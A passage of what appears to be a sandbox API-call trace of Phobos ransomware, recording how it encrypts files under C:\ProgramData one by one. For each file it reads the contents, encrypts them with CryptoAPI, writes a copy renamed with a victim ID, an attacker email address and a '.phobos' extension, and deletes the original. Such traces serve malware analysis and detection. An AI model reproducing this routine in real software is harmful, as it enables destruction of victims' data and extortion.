CryptDestroyKey (hKey=0xa32968) returned 1 [0175.748] CloseHandle (hObject=0x194) returned 1 [0175.748] CloseHandle (hObject=0x17c) returned 1 [0175.748] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\SystemIndex\\SecStore\\CiST0000.002" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\windows\\projects\\systemindex\\secstore\\cist0000.002")) returned 1 [0175.749] SetEvent (hEvent=0xe8) returned 1 [0175.750] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0175.750] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-trace.etl" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-trace.etl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0175.750] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=131072) returned 1 [0175.750] CloseHandle (hObject=0x17c) returned 1 [0175.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-trace.etl" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-trace.etl")) returned 0x2020 [0175.750] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-trace.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-trace.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.750] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-trace.etl" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-trace.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0175.750] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0175.750] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0175.750] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-trace.etl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-trace.etl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0175.751] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0175.751] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0175.751] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x20000, lpOverlapped=0x0) returned 1 [0175.820] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20010, dwBufLen=0x20010 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20010) returned 1 [0175.822] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20010, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20010, lpOverlapped=0x0) returned 1 [0175.830] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0175.830] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0175.830] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0175.830] CryptDestroyKey (hKey=0xa32d28) returned 1 [0175.830] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0175.830] CryptDestroyKey (hKey=0xa32968) returned 1 [0175.830] CloseHandle (hObject=0x17c) returned 1 [0175.830] CloseHandle (hObject=0x194) returned 1 [0175.830] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-trace.etl" (normalized: "c:\\programdata\\microsoft\\windows\\power efficiency diagnostics\\energy-trace.etl")) returned 1 [0175.832] SetEvent (hEvent=0xe8) returned 1 [0175.832] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0175.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 01.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 01.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0175.832] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=201833) returned 1 [0175.832] CloseHandle (hObject=0x194) returned 1 [0175.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 01.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 01.wma")) returned 0x20 [0175.832] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 01.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 01.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0175.832] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 01.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 01.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0175.833] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0175.833] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0175.833] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 01.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 01.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0175.833] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0175.833] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0175.833] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x31469, lpOverlapped=0x0) returned 1 [0175.861] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x31470, dwBufLen=0x31470 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x31470) returned 1 [0175.863] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x31470, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x31470, lpOverlapped=0x0) returned 1 [0176.003] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0176.003] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.003] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.003] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.003] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.003] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.003] CloseHandle (hObject=0x194) returned 1 [0176.003] CloseHandle (hObject=0x17c) returned 1 [0176.003] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 01.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 01.wma")) returned 1 [0176.005] SetEvent (hEvent=0xe8) returned 1 [0176.005] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.005] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 02.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 02.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.006] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=139199) returned 1 [0176.006] CloseHandle (hObject=0x17c) returned 1 [0176.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 02.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 02.wma")) returned 0x20 [0176.006] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 02.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 02.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.006] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 02.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 02.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.006] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.006] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.006] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 02.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 02.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.006] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0176.006] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.006] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x21fbf, lpOverlapped=0x0) returned 1 [0176.029] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x21fc0, dwBufLen=0x21fc0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x21fc0) returned 1 [0176.030] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x21fc0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x21fc0, lpOverlapped=0x0) returned 1 [0176.032] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32d28) returned 1 [0176.032] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.032] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.032] CryptDestroyKey (hKey=0xa32d28) returned 1 [0176.032] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.033] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.033] CloseHandle (hObject=0x17c) returned 1 [0176.033] CloseHandle (hObject=0x194) returned 1 [0176.033] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 02.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 02.wma")) returned 1 [0176.034] SetEvent (hEvent=0xe8) returned 1 [0176.034] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.034] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 03.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 03.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.035] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=94457) returned 1 [0176.035] CloseHandle (hObject=0x194) returned 1 [0176.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 03.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 03.wma")) returned 0x20 [0176.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 03.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 03.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.035] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 03.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 03.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.035] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.035] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.035] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 03.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 03.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0176.036] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.036] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x170f9, lpOverlapped=0x0) returned 1 [0176.180] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x17100, dwBufLen=0x17100 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x17100) returned 1 [0176.181] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x17100, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x17100, lpOverlapped=0x0) returned 1 [0176.183] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0176.183] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.183] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.183] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.183] WriteFile (in: hFile=0x17c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.183] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.183] CloseHandle (hObject=0x194) returned 1 [0176.183] CloseHandle (hObject=0x17c) returned 1 [0176.184] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 03.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 03.wma")) returned 1 [0176.185] SetEvent (hEvent=0xe8) returned 1 [0176.185] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.186] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 04.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 04.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.186] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=237625) returned 1 [0176.186] CloseHandle (hObject=0x17c) returned 1 [0176.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 04.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 04.wma")) returned 0x20 [0176.186] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 04.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 04.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.186] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 04.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 04.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.186] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.186] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.186] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 04.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 04.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.187] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32968) returned 1 [0176.187] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.187] ReadFile (in: hFile=0x17c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3a039, lpOverlapped=0x0) returned 1 [0176.260] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3a040, dwBufLen=0x3a040 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x3a040) returned 1 [0176.263] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x3a040, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x3a040, lpOverlapped=0x0) returned 1 [0176.266] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ba8) returned 1 [0176.266] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0176.266] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0176.266] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0176.266] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0176.266] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.266] CloseHandle (hObject=0x17c) returned 1 [0176.267] CloseHandle (hObject=0x194) returned 1 [0176.267] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 04.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 04.wma")) returned 1 [0176.274] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0176.274] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 06.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 06.wma"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.275] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=94457) returned 1 [0176.275] CloseHandle (hObject=0x194) returned 1 [0176.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 06.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 06.wma")) returned 0x20 [0176.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 06.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 06.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.275] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 06.wma" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 06.wma"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0176.275] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.275] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0176.275] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\Ringtones\\Ringtone 06.wma.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\windows\\ringtones\\ringtone 06.wma.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 